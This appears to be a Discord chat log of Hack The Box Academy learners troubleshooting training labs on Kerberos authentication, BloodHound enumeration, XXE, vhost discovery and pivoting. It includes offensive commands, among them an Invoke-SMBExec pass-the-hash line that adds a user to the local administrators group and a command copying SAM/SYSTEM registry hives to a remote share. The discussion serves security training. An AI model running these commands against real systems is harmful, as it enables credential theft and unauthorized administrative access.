first thing is to get your vpn working so you can connect to the box.

tyring the pwnbox now

Use FQDN instead of IP

That can go in vhosts

But it doesn't have an fqdn for this section

Just ip (10.129.x.x)

yep

sorry yall, I guess Elon is clogging all my traffic today, its taking forever for a pwnbox to spawn

¯_(ツ)_/¯

Pwnbox usually takes a few minutes

thanks obama

maybe also try to killall openvpn

no processes found still getting hung up on the link remote - I think I'll just try again later

seems to be some issue with my connection

yeahhhh I give up

I just changed servers

did everything

and still nothing

wasted way too much time on this, idk how yall got it but kuddos to you

Weird that it's not working for you

I literally just did the steps

me too

idk

Signed in as Bob--> attempted to sign in as bonni on DC1 --> signed in with htb-student

exactly

that is what i did

which vpn server are you on?

Eu 1

I am doing it through pwnbox

and I am on UK

so literally almost the same

but still you can connect here so... maybe try udp or tcp, change region

I did it on my own vm, but I'll spin up pwnbox just for you

thank you, it it is the pwnbox issue I hope I dont crash out XD

I even reset the target so it's not just pulling from what I just did

thank you XD

Gonna have to call it skill issue buddy... UK pwnbox, Eu1 academy server, fresh instance

what am I doing wrong

You're specifying DC1 in the connection and not the IP correct?

I AM SUPPOSED TO BE SPECIFYING DC1?!

YES

I am specifying the IP of DC

You're literally told to authenticate to DC1

DC1 172.16.18.3

Use the name

Not the IP

what is the difference tho

Brooother

they are related

literally each points to the other

The way that they're routed even though they resolve.

You're told DC1 use DC1 not the IP

Otherwise it might generate a different error

I hate it

I SPENT more than 2 hours

on this'

In short: when they tell you a hostname to use: use the hostname

just for the thing to be DC1 like bro in the document it says DC1 ip is 172.16.18.3

I am done

thank you, I appreciate it

this is the weirdest thing I have had to deal with

Note that it didn't even do the "connecting to"...

it really did not

anyways, I would like to appologize to the mod @autumn pilot for being rude, I know you were trying to be helpful, these kind of things are just frustrating and you closed the ticket out of nowhere so I got frustrated, I am sorry for being rude to you

good night yall

thanks to everyone who helped

May God reward you all and bless you abundantly

hello everyone

It's just how authentication is handled with Kerberos. When you specify DC1 you're specifically requesting access through auth protocols to DC1, when you use IP it is using basic authentication

I'm doing the "Working with IDS/IPS" modules and I'm blocked in the "Snort Rule Development" chapter

I checked in the forum for some help: https://forum.hackthebox.com/t/working-with-ids-ips-snort-rule-development/305483

however, it seems I need to do a lot of guessing to find the good keyword.

It's generating a logon failure instead of an audit failure

Instead of going through Kerberos, it's going through NTLM

I understand the key is inside the user agent but I tried someone without success

hi all,

I'm trying to get all domain information from the terminal with bloodhound, but my command doesn't work.

whats the error

my command

bloodhound-python -d INLANEFREIGHT.LOCAL -u user -p 'password' -c all -dc ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL -ns 10.129.152.122

Traceback (most recent call last):
File "/usr/bin/bloodhound-python", line 33, in <module>
sys.exit(load_entry_point('bloodhound==1.7.2', 'console_scripts', 'bloodhound-python')())
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/bloodhound/init.py", line 308, in main
ad.dns_resolve(domain=args.domain, options=args)
File "/usr/lib/python3/dist-packages/bloodhound/ad/domain.py", line 698, in dns_resolve
q = self.dnsresolver.query(query, 'SRV', tcp=self.dns_tcp)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/dns/resolver.py", line 1364, in query
return self.resolve(
^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/dns/resolver.py", line 1321, in resolve
timeout = self._compute_timeout(start, lifetime, resolution.errors)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/dns/resolver.py", line 1075, in _compute_timeout
raise LifetimeTimeout(timeout=duration, errors=errors)
dns.resolver.LifetimeTimeout: The resolution lifetime expired after 3.105 seconds: Server Do53:10.129.152.122@53 answered The DNS operation timed out.

do u have the ms01 in your hosts file?

10.129.152.122 INLANEFREIGHT.LOCAL

makes sense

thanks for explaining

Read the error message, it says dns timed out

check -h on the relevant arguments to dns

hey I solved two questions out of three. I went back to do updated information gathering web edition module stuff that got added. It turns out I was able to solve questions one and three of the fingerprinting section. The thing is I need to know why the following is not working

┌─[✗]─[htb-ac-605555@htb-vcrprdkg31]─[~]
└──╼ $curl -I http://10.129.190.67
HTTP/1.1 200 OK
Date: Thu, 27 Jun 2024 21:09:04 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 16 Aug 2021 18:15:18 GMT
ETag: "b8-5c9b12f02857c"
Accept-Ranges: bytes
Content-Length: 184
Vary: Accept-Encoding
Content-Type: text/html

or this

─[htb-ac-605555@htb-vcrprdkg31]─[~]
└──╼ $nikto -h 10.129.190.67 -Tuning b
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.129.190.67
+ Target Hostname:    10.129.190.67
+ Target Port:        80
+ Start Time:         2024-06-27 16:10:08 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: b8, size: 5c9b12f02857c, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
^[c+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, HEAD, GET .```

etc. It will not give me content management system

and its not wordpress. I tried curl -I http and curl -I https

are we allowed to ask a question about the Pentesting Exam?

can someone give me a clue as to what I'm doing wrong?

depends. if its for someone to help you with actual exam then no

you can ask, but the responses will depend on what you're asking

Not even gonna waste my time

did you visit the website?

yes

which is http://10.129.190.67

it won't connect to app.inlanefreight.local

I tried app.10.129.190.67 and app.inlanefreight.local

only thing that returns a web page is http://10.129.190.67

not http://10.129.190.67, not https://10.129.190.67

not http://10.129.190.67/app

and so on and so forth

I tried dirb on it and couldn't find anything

did you add it to your hosts file?

no how do I do that? should I just google it?

If I remember correctly, just have a look at the website and you’ll find the cms.

ok

he didn't add the vhost to the host file, this won't help

brother

how many modules in the path have you done

isn't this like

Information Gathering - Web Edition stuff

you're taught how to add vhosts from that module iirc

four or five

ok I will look that up then since it sounds like I just need to review it

which module is this

You are right. I wasn’t remembering it well.

it's this

huh

yeah it should teach you then

@quasi wave review this section pls

solved it

thank you

module/112/section/1066
footprinting

can't find the login for the ftp

pls provide the section name instead of number

should be Footpringgle

figutred it

Footpringgle

don't worry i found out what it was

ok nice

nice

footpringles?

is that a new flavour

hi. I am reading Pass The Hash section in Password attacks. In the subsection "Pass the Hash with Powershell Invoke-TheHash(Windows)" subsection I com accross this sentence:
Local administrator privileges are not required client-side, but the user and hash we use to authenticate need to have administrative rights on the target computer

It's not clear to me why the hash we passing must have admin rights...? Is it just to do with the commands we want to run- i.e. add users into local admin or use a socket to connect back with reverse shell?

but surely we can just run cmd.exe regardless of whether the hash we authenticate as has admin privs?

You can run cmd as any user, however some commands can only be run as admins

thx. thats what i figured. The sentence is a little confusing. It seems to imply that you need to have captured the hash of an admin user in order to use the tool on the target. But I'm guessing I can pass it a hash of a normal user as long as i am not trying to run something on the target that requires admin privs

tool in question is Invoke-TheHash

No

Not that I'm aware of at least

i'll see if i can test

But it also depends on what subprocesses are required

yeah maybe the tcp-connect socket perms

specifically the techniques used in that repo to get shells do require admin

Impersonation shenanigans

generally all the exec methods need admin

Runas (but better)

ok that makes sense

now the sentence makes sense

so the functions used by Invoke-TheHash requires admin privs

thx for clarifying

only the *exec methods

those are used to get a shell

Invoke-SMBExec -Target 172.16.1.10 -Domain inlanefreight.htb -Username julio -Hash <..> -Command "net user mark Password123 /add && net localgroup administrators mark /add" -Verbose

looking at this. Invoke-SMBExec is a function being executed on the client and not the target?

obv. the command "net user... " requires admin privs

The /add part requires admin

hello does someone have a moment to tell me why this password is not working i can screen share if someone doesnt mind. pillaging chapter in window priv esc module

yeah that for sure given it's the admin group

question 5

It's being run on the target ip

but we can replace that with cmd.exe and wonder if it works

“Administrative rights are permissions granted by administrators to users which allow them to create, delete, and modify items and settings"
Found that here, wasn’t clear for me either reading that sentence : https://kb.iu.edu/d/army

yeah the command is run on the target machine. think best i play with it

Asking again.
https://academy.hackthebox.com/module/136/section/1291
Try to read the source code of 'upload.php' to identify the uploads directory, and use its name as the answer. (write it exactly as found in the source, without quotes)

Managed to read flag.txt with XXE in svg.

Tried to use XSS in XML to read upload.php
Tried to use XXE to read /var/www/html/upload.php

if you try to curl it do you see source code?

I see the html on the main page.
visiting /upload.php returns "Only SVG images are allowed"

Im new so this was the idea i had, but can't really help more than that. Hope you figure it out.

they're asking for a hash, not a password

bro did you try to load the page in your browser and right click/view source?

Then upload a "svg" image

But also can you visit upload.php directly?

Yes

I did and then it redirects to home.

Yes, it just returns a error "Only SVG images are allowed"

Can you catch the requests?

maybe this help?

Note this is an ai generated response

So mileage may vary

correct

hey! were you able to get any nudges? Im stuck on the otp portion right now

Already tried.

shells and payloads - infiltrating linux: trying to find a way in, --script=vuln threw an RCE for apache my way, but when loaded in metasploit it tells me that it's not vulnerable?

You're focusing too wide

you can use xxe to read flag.txt, change it to read the source code

the other payload in the section is useful

focusing too wide?

Yes

I saw that lol

Apache isn't what's vulnerable here

Did you look at the webpage?

Honestly, no... lol - I've been trying to get into a habbit of not using metasploit for everything and instead looking for what --script=vuln returns as a download and read through the configuration and use it as opposed to being a "script kiddie"

but I'll give that a look

Tried to read /var/www/html/upload.php and /var/www/upload.php

Didn't exist

how do you know that that's the full path?

Just relying on nmap --scripts=vuln is also being a script kiddie

why not just use relative path

You need to be able to figure things based on multiple tools as nmap's output even tells you it can be wrong

Going to try that, in the other challenges the flag was usually placed at root so presumed it to be the same

Or it can throw some vuln at you that's entirely unrelated

oh no absolutely marcie, it's just the first step of a mental "process" that I've been trying to get myself into, sort of developing a methodology that works for me and makes sense

Idk if I explained that right though

Things to note: what ports are open. Always start investigating those

80/443? Let's look at it in a browser

full path also works, just tested

usually, I'll do nmap -sCV -T4 <ip> as a base, and then run --script=vuln, if nothing comes back I'll navigate to the website and wappalyze for a version to look up and go from there, guess that's why this one threw me off

@fathom pendant im gonna be like you when i finish this course and exam and just help people i feel like this is a huge way to learn yourself and give nudges to others youre so helpful

Well it sounds like you didn't even look at the website

Always think: "if it's complicated, is there a simpler way"

I.e. if it's a wide vuln (i.e. apache as a whole) then there must be something simpler

If you see an underlying web service is the vuln thrown back: assume that's not the path forward (unless specifically tomcat, but tomcat is special)

Yeah now it worked.
Probably was doing a stupid mistake at the time like having an extra /.

so i was able to get to where the sam and system file are but i cant copy it over

asks for destination

Copy-Item -Path C:\Windows\System32\config -destinaton \10.10.14.122\fismathack

Your error is saying positional parameter not found

You basically gave it 3 parameters

what should it look like?

Your command here and what you showed are 2 different commands

tht was an example i had to fill in my own info

but destination was in there and im not sure what im supposed to put

Copy-Item -Path (path to thing you want to copy) -Destination (your remote share)

If you can't see what's different between your command and what's expected take a minute to read

i need some help on the Socks RDP part.

i have the following chain:

me --> pivot1 (win) --> pivot2 (win) --> victim.

i have the SocksRDP dll running on pivot1, and I'm in pivot2. i need to get the SocksRDP-server.exe to this host, but i'm stuck on the best way to transfer it?

nevermind, i used a base64 string generated in my VM, then copy/pasted into the RDP session....was one hell of a string given its size lol

im very interested in how others do it as i'm not sure that'd always work (particularly if clipboard is disabled)

at the risk of sound dumb, I'm not sure the public exploits intro module works.

but i'm all ears if anyone has ideas.

it works

if someone has done the broken auth module skills assessment can I PLEASE get a nudge - i went through forums and got a nudge but I think I just am missing a SMALL piece to get the flag.. and this is the LAST skills assessment before i 100 percent the course hehe

or im dumb idk take your pick - super close or super dumb - never really know with these skills assessments 🥲

@dim wolf - Was your "it works" directed at my comment?

yea

Could I dm you quick?

nah i'm doing the exam rn

good luck

I'm still on INFORMATION GATHERING - WEB EDITION Skills Assessment.
I've fuzzed vhosts and found another subdomain and added it to my /etc/hosts file. I've just tried fuzzing both the parent and subdomain to find the hidden admin directory as mentioned in Q3 but I can't find a wordlist that works. I've tried directory-list-2.3-medium.txt which was in the FFUF module, as well as raft-small-directories-lowercase.txt which was mentioned in the old cheat sheet for this module. Does anyone have any suggestions as to a suitable wordlist? I can't see any examples of directory scanning in this module (other than using the Scrapy module which turns up nothing).

oh boy pwnbox is updated

think about robots

but there is not update in my pwn

what question are you asking for?

Q3?

what's going on here??

Yes. I've found that now. Thanks. I only need to answer the final question as this is a re-do with the updated module but trying to work through the full assessment

ah the final question

don't overcomplicate thing , the tool you need is in the module with the suitable wordlist , enumeration is an iterative process so you may need to redo the technique to find new things

you said you found a subd of a subd?

spider that second one

re-do it from scratch

and since it's meant for future; it'll be in a comment

you can actually cat the json file and pipe it to cat results.json | jq -r '.comments'

(jq -r '.key')

smart

ReconSpider (HTB) is a nifty tool

I was doing the assessment from scratch, but I can't enter any answers except for the final one. I'd looked for robots on the parent domain but had forgotten to retry after discovering the subdomain. That HTB ReconSpider (I'd searched online and found another tool of the same name), is going in my toolbox for future crawling.

I know , I was in the same situation

if you can't find the robots.txt in that domain , then you are in wrong domain (the question guide to look for robots.txt)

The GH one by the same name is completely different and requires a paid API key from what people have said

that's for Q3

that's for the whole assessment

i mean using robots.txt is pretty standard for most web related hunting anyway

but is there a robots .txt in the other one?

No

it's just a chain of clicks

with a surprise in the comments on one of them

That's what stumped me. I'd got that hint and looked on the parent domain. Forgot after I found the subdomain because it had taken some time.

yeah ReconSpider (HTB) makes quick work of crawling it's way through the silly links

👀

if I give htb money, will the vm performance improve?

or is it always like using dialup?

what?

give htb money*

no, all the environments are the same as far as i know

so its always this slow?

i haven't really experienced that so not sure what you're talking about

i've seen services down once in a while, but nothing i would consider slow for what it is